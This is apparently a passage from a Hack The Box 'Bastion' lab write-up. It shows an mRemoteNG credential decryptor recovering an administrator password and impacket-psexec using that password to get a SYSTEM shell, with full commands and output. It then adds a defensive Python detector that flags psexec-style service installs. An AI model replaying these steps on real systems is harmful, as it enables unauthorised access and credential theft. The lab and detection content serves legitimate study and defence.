mRemoteNG Decryptor


I found this Python script that decrypts the encrypted credentials stored in mRemoteNG.

┌──(kali㉿kali)-[~/archive/htb/labs/bastion]
└─$ python3 mRemoteNG_decryptor.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
password: thXLHM96BeKL0ER2

Running the Python script with the -s flag to provide the encrypted Base64 string just gives me the password. The decrypted password for the administrator user is thXLHM96BeKL0ER2

Privilege Escalation


┌──(kali㉿kali)-[~/archive/htb/labs/bastion]
└─$ impacket-psexec 'administrator:thXLHM96BeKL0ER2@bastion' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.134.....
[*] Found writable share ADMIN$
[*] Uploading file KiABPSOp.exe
[*] Opening SVCManager on 10.10.10.134.....
[*] Creating service qJVQ on 10.10.10.134.....
[*] Starting service qJVQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
Bastion
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::201
   IPv6 Address. . . . . . . . . . . : dead:beef::25e3:a1fe:1ad9:366b
   Link-local IPv6 Address . . . . . : fe80::25e3:a1fe:1ad9:366b%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.134
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%4
                                       10.10.10.2
 
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb
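
From the defender's side, the psexec run above leaves a service-install record on the target (Service Control Manager event 7045). The following is an added example, not part of the original write-up: it scores such records against the naming shape visible in the transcript. The event field names and sample records are constructed, and the three signals are a heuristic assumption rather than a complete detection.

```python
import re
from ntpath import basename, dirname, normpath

# Constructed sample of event 7045 fields (not real logs).
# The first record reuses the service and file names from the transcript above.
SAMPLE_EVENTS = [
    {"host": "BASTION", "service": "qJVQ", "image_path": r"%systemroot%\KiABPSOp.exe"},
    {"host": "BASTION", "service": "Sysmon64", "image_path": r"C:\Windows\Sysmon64.exe"},
    {"host": "BASTION", "service": "WaaSMedicSvc",
     "image_path": r"C:\Windows\System32\svchost.exe -k wusvcs -p"},
    {"host": "BASTION", "service": "abcd", "image_path": r'"C:\Program Files\Tool\abcd.exe"'},
]

# ADMIN$ maps to the Windows directory, so a binary dropped there sits in its root.
WINROOT = re.compile(r"^(%systemroot%|%windir%|[a-z]:\\windows)$", re.I)


def split_image(image_path):
    """Return (directory, file name) of the executable, ignoring quotes and arguments."""
    m = re.match(r'^\s*"([^"]+)"|^\s*(\S+)', image_path)
    exe = normpath(m.group(1) or m.group(2))
    return dirname(exe), basename(exe)


def signals(event):
    """List the traits this install shares with the psexec run in the transcript."""
    directory, name = split_image(event["image_path"])
    found = []
    if re.fullmatch(r"[A-Za-z]{4}", event["service"]):
        found.append("4-letter service name")
    if WINROOT.match(directory):
        found.append("binary directly in the ADMIN$ root")
    if re.fullmatch(r"[A-Za-z]{8}\.exe", name, re.I):
        found.append("8-letter executable name")
    return found


def flag_installs(events, threshold=3):
    """Return (service, signals) for events showing at least `threshold` signals."""
    scored = [(ev["service"], signals(ev)) for ev in events]
    return [(svc, found) for svc, found in scored if len(found) >= threshold]


if __name__ == "__main__":
    for service, found in flag_installs(SAMPLE_EVENTS):
        print(f"suspicious service install: {service}: {', '.join(found)}")
```

Requiring all three signals keeps a legitimately installed tool in the Windows root, such as the constructed Sysmon64 record, from being flagged on location alone.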

System Level Compromise